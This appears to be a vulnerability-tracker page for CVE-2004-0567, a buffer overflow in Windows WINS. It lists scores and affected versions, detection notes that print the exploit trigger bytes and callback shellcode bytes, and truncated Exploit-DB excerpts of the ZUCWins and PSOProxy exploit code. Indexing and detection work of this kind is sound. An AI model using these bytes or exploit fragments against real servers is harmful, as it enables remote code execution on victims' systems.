CVE-2004-0567
published 2004-12-31CVE-2004-0567: The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
72.29%
99.4th percentile
The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server 2003 does not properly validate the computer name value in a WINS packet, which allows remote attackers to execute arbitrary code or cause a denial of service (server crash), which results in an "unchecked buffer" and possibly triggers a buffer overflow, aka the "Name Validation Vulnerability."
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_nt | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04
bytes↗
\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c
- →Monitor for anomalous inbound TCP connections to the WINS service (port 42) containing the malformed packet header bytes 00 03 0d 4c 77 77 FF 77 05 4e 00 3c, which is the exploit trigger packet for CVE-2004-0567. ↗
- →The exploit shellcode uses XOR obfuscation with key 0x93939393 for the callback IP and 0x9393 for the callback port embedded in the payload; scan WINS traffic for payloads containing the repeating byte pattern 93 93 93 93. ↗
- →The exploit sends a large (~200 KB) repeated pattern buffer to the WINS service; alert on unusually large TCP payloads destined for port 42 (WINS). ↗
- →The vulnerability is an unchecked buffer in WINS computer name validation; the WINS service (wins.exe) crashing or restarting unexpectedly on Windows 2000 SP3/SP4 or Windows Server 2003 may indicate exploitation attempts. ↗
- ·The exploit targets Windows 2000 SP3/SP4 specifically; the author notes it 'probably' works across all language versions, but the hardcoded offsets and shellcode may not be reliable across all patch levels of NT4 SP6a, NT Terminal Server 4.0 SP6, or Windows Server 2003 also listed as vulnerable. ↗
- ·The callback IP and port in the shellcode are XOR-encoded at runtime; static byte-pattern signatures for the shellcode must account for the variable encoded bytes at offsets 2–5 (port) and 4–7 (IP) within the shellcode buffer. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000 - WINS Remote Code Execution
exploitdb·2004-12-31
CVE-2004-0567 Microsoft Windows Server 2000 - WINS Remote Code Execution
Microsoft Windows Server 2000 - WINS Remote Code Execution
---
/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by: zuc */
/* works on Windows 2000 SP3/SP4 probably every language */
/*************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\
Exploit-DB
PSOProxy 0.91 - Remote Buffer Overflow (1)
exploitdb·2004-02-20
CVE-2004-0313 PSOProxy 0.91 - Remote Buffer Overflow (1)
PSOProxy 0.91 - Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/9706/info
It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.
A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server.
/*
** Voici mon 1er exploit, il traite d'une faille dans le programme PSOProxy v0.91
** Il s'agit d'un buffer overflow type et facile a faire (c pour a que j'ai russi ^^)
**
** Pour des infos tecniques aller ici : http://seclists.org/lists/bugtraq/2004/Feb/0567.html
**
** Sinon l'exploit consiste en : 1. on ce connecte au pc distnant
** 2. on envoit le co
No writeups or analysis indexed.
http://secunia.com/advisories/13466http://securitytracker.com/id?1012517http://www.ciac.org/ciac/bulletins/p-054.shtmlhttp://www.kb.cert.org/vuls/id/378160http://www.osvdb.org/12370http://www.securityfocus.com/bid/11922https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-045https://exchange.xforce.ibmcloud.com/vulnerabilities/18259http://secunia.com/advisories/13466http://securitytracker.com/id?1012517http://www.ciac.org/ciac/bulletins/p-054.shtmlhttp://www.kb.cert.org/vuls/id/378160http://www.osvdb.org/12370http://www.securityfocus.com/bid/11922https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-045https://exchange.xforce.ibmcloud.com/vulnerabilities/18259
2004-12-31
Published